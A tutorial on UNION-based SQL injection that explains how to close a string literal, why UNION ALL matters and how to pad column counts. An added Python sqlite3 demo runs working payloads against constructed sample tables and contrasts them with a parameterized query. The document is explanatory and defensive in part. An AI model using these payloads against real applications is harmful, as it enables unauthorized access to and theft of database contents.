SQL Injection
Basic UNION
SELECT queries are used to retrieve information from a database. Most web
applications that use dynamic content of any kind will build pages using
information returned from SELECT queries. Most of the time, the part of the
query that you will be able to manipulate will be the WHERE clause.
To make the server return records other than those intended, modify a WHERE
clause by injecting a UNION SELECT. This allows multiple SELECT queries to be
specified in one statement. Here’s one example:
SELECT CompanyName FROM Shippers WHERE 1 = 1 UNION ALL SELECT
CompanyName FROM Customers WHERE 1 = 1
This returns the result sets of the first and second query together. The ALL
matters: a plain UNION removes duplicate rows from the combined result, as
though SELECT DISTINCT had been applied, so injected rows that happen to repeat
are silently merged away; UNION ALL keeps every row. Also make sure the first
query (the one the web application's developer intended to be executed)
returns no records, so that only the injected rows come back. Suppose you are
working on a script with the following code:
SQLString = "SELECT FirstName, LastName, Title FROM Employees
WHERE City = '" & strCity & "'"
And you use this injection string:
' UNION ALL SELECT OtherField FROM OtherTable WHERE ''='
The following query will be sent to the database server:
SELECT FirstName, LastName, Title FROM Employees WHERE City = ''
UNION ALL SELECT OtherField FROM OtherTable WHERE ''=''
The leading quote closes the developer's string literal, and the trailing
WHERE ''=' is completed by the closing quote the script appends, so the
statement stays syntactically valid. One check before sending it: every SELECT
joined by UNION must return the same number of columns with compatible types.
The intended query returns three columns, so a single OtherField will be
rejected by the database; pad the injected SELECT to three columns (for
example OtherField, NULL, NULL) so the column counts line up.
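The injection above, worked end to end as an added example (not code from the original page). It uses Python's sqlite3 module in place of the ASP script, mirrors the same string concatenation, and runs against constructed sample tables. It shows the column-count error the one-column payload triggers, the padded payload pulling OtherTable rows through the Employees query, what plain UNION does to duplicates, and that a parameterized query is not affected:

```python
import sqlite3

# Constructed sample data standing in for the page's Employees and OtherTable.
SCHEMA = """
CREATE TABLE Employees (FirstName TEXT, LastName TEXT, Title TEXT, City TEXT);
INSERT INTO Employees VALUES ('Nancy', 'Davolio', 'Sales Representative', 'Seattle');
INSERT INTO Employees VALUES ('Andrew', 'Fuller', 'Vice President', 'Tacoma');
CREATE TABLE OtherTable (OtherField TEXT);
INSERT INTO OtherTable VALUES ('secret-1');
INSERT INTO OtherTable VALUES ('secret-1');
INSERT INTO OtherTable VALUES ('secret-2');
"""

# The page's payload (one column) and a padded variant that matches the
# three columns of the intended SELECT. The trailing ''=' is closed by the
# quote the application appends.
PAYLOAD_ONE_COLUMN = "' UNION ALL SELECT OtherField FROM OtherTable WHERE ''='"
PAYLOAD_PADDED = "' UNION ALL SELECT OtherField, NULL, NULL FROM OtherTable WHERE ''='"
PAYLOAD_PADDED_NO_ALL = "' UNION SELECT OtherField, NULL, NULL FROM OtherTable WHERE ''='"


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_sql(str_city):
    # Same construction as the ASP line:
    #   SQLString = "SELECT ... WHERE City = '" & strCity & "'"
    return ("SELECT FirstName, LastName, Title FROM Employees WHERE City = '"
            + str_city + "'")


def attempt(conn, str_city):
    """Run the string-built query. Returns ('rows', rows) or ('error', msg)."""
    try:
        rows = conn.execute(vulnerable_sql(str_city)).fetchall()
        return "rows", rows
    except sqlite3.OperationalError as exc:
        # A column-count mismatch between the two SELECTs fails at prepare time.
        return "error", str(exc)


def safe_query(conn, str_city):
    # Parameterized: the payload is bound as a plain string value, never parsed.
    sql = "SELECT FirstName, LastName, Title FROM Employees WHERE City = ?"
    return conn.execute(sql, (str_city,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("normal:      ", attempt(db, "Seattle"))
    print("one column:  ", attempt(db, PAYLOAD_ONE_COLUMN))
    print("padded ALL:  ", attempt(db, PAYLOAD_PADDED))
    print("padded UNION:", attempt(db, PAYLOAD_PADDED_NO_ALL))
    print("parameterized:", safe_query(db, PAYLOAD_PADDED))
```

The first query returns nothing for City = '', so everything that comes back from the padded payload is OtherTable data; with plain UNION the two identical 'secret-1' rows collapse into one, which is why the text insists on ALL. Column types also have to be compatible; NULL is the usual padding because it coerces to anything.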
